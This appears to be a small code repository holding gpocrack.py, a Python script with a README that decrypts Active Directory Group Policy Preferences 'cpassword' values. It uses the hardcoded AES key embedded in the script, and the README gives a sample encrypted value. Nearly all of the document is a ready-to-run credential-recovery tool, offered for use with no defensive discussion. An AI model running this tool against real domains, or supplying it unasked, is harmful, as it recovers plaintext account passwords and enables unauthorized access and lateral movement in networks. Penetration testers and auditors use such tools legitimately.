├── .gitignore ├── README.md └── gpocrack.py /.gitignore: -------------------------------------------------------------------------------- 1 | 2 | # Created by https://www.gitignore.io/api/ao,git,python,vim,osx 3 | 4 | #!! ERROR: ao is undefined. Use list command to see defined gitignore types !!# 5 | 6 | ### Git ### 7 | *.orig 8 | 9 | 10 | ### Python ### 11 | # Byte-compiled / optimized / DLL files 12 | __pycache__/ 13 | *.py[cod] 14 | *$py.class 15 | 16 | # C extensions 17 | *.so 18 | 19 | # Distribution / packaging 20 | .Python 21 | env/ 22 | build/ 23 | develop-eggs/ 24 | dist/ 25 | downloads/ 26 | eggs/ 27 | .eggs/ 28 | lib/ 29 | lib64/ 30 | parts/ 31 | sdist/ 32 | var/ 33 | wheels/ 34 | *.egg-info/ 35 | .installed.cfg 36 | *.egg 37 | 38 | # PyInstaller 39 | # Usually these files are written by a python script from a template 40 | # before PyInstaller builds the exe, so as to inject date/other infos into it. 41 | *.manifest 42 | *.spec 43 | 44 | # Installer logs 45 | pip-log.txt 46 | pip-delete-this-directory.txt 47 | 48 | # Unit test / coverage reports 49 | htmlcov/ 50 | .tox/ 51 | .coverage 52 | .coverage.* 53 | .cache 54 | nosetests.xml 55 | coverage.xml 56 | *,cover 57 | .hypothesis/ 58 | 59 | # Translations 60 | *.mo 61 | *.pot 62 | 63 | # Django stuff: 64 | *.log 65 | local_settings.py 66 | 67 | # Flask stuff: 68 | instance/ 69 | .webassets-cache 70 | 71 | # Scrapy stuff: 72 | .scrapy 73 | 74 | # Sphinx documentation 75 | docs/_build/ 76 | 77 | # PyBuilder 78 | target/ 79 | 80 | # Jupyter Notebook 81 | .ipynb_checkpoints 82 | 83 | # pyenv 84 | .python-version 85 | 86 | # celery beat schedule file 87 | celerybeat-schedule 88 | 89 | # dotenv 90 | .env 91 | 92 | # virtualenv 93 | .venv/ 94 | venv/ 95 | ENV/ 96 | 97 | # Spyder project settings 98 | .spyderproject 99 | 100 | # Rope project settings 101 | .ropeproject 102 | 103 | 104 | ### Vim ### 105 | # swap 106 | [._]*.s[a-v][a-z] 107 | [._]*.sw[a-p] 108 | [._]s[a-v][a-z] 109 | [._]sw[a-p] 110 | # session 111 | Session.vim 112 | # temporary 113 | .netrwhist 114 | *~ 115 | # auto-generated tag files 116 | tags 117 | 118 | 119 | ### OSX ### 120 | *.DS_Store 121 | .AppleDouble 122 | .LSOverride 123 | 124 | # Icon must end with two \r 125 | Icon 126 | # Thumbnails 127 | ._* 128 | # Files that might appear in the root of a volume 129 | .DocumentRevisions-V100 130 | .fseventsd 131 | .Spotlight-V100 132 | .TemporaryItems 133 | .Trashes 134 | .VolumeIcon.icns 135 | .com.apple.timemachine.donotpresent 136 | # Directories potentially created on remote AFP share 137 | .AppleDB 138 | .AppleDesktop 139 | Network Trash Folder 140 | Temporary Items 141 | .apdisk 142 | 143 | # End of https://www.gitignore.io/api/ao,git,python,vim,osx 144 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # GPOCRACK.py 2 | 3 | Active Directory Group Policy Preferences cpassword cracker/decrypter. 4 | 5 | ## How to use 6 | 7 | > python gpocrack.py LjFWQMzS3GWDeav7+0Q0oSoOM43VwD30YZDVaItj8e0 8 | -------------------------------------------------------------------------------- /gpocrack.py: -------------------------------------------------------------------------------- 1 | import sys 2 | import base64 3 | from Crypto.Cipher import AES 4 | 5 | if len(sys.argv) != 2: 6 | print("Incorrect amount of arguments.") 7 | print("How to use:") 8 | print("$ python {} LjFWQMzS3GWDeav7+0Q0oSoOM43VwD30YZDVaItj8e0".format(sys.argv[0])) 9 | sys.exit() 10 | 11 | cpassword = sys.argv[1] 12 | 13 | while len(cpassword) % 4 > 0: 14 | cpassword += "=" 15 | 16 | decoded_password = base64.b64decode(cpassword) 17 | 18 | # This is a Microsoft hardcoded key used to decrypt the GPO hash. 19 | key = '\x4e\x99\x06\xe8\xfc\xb6\x6c\xc9\xfa\xf4\x93\x10\x62\x0f\xfe\xe8\xf4\x96\xe8\x06\xcc\x05\x79\x90\x20\x9b\x09\xa4\x33\xb6\x6c\x1b' 20 | 21 | decryption_suite = AES.new(key, AES.MODE_CBC, '\00'*16) 22 | plain_text = decryption_suite.decrypt(decoded_password) 23 | 24 | print("Password is: {}".format(plain_text.strip())) 25 | --------------------------------------------------------------------------------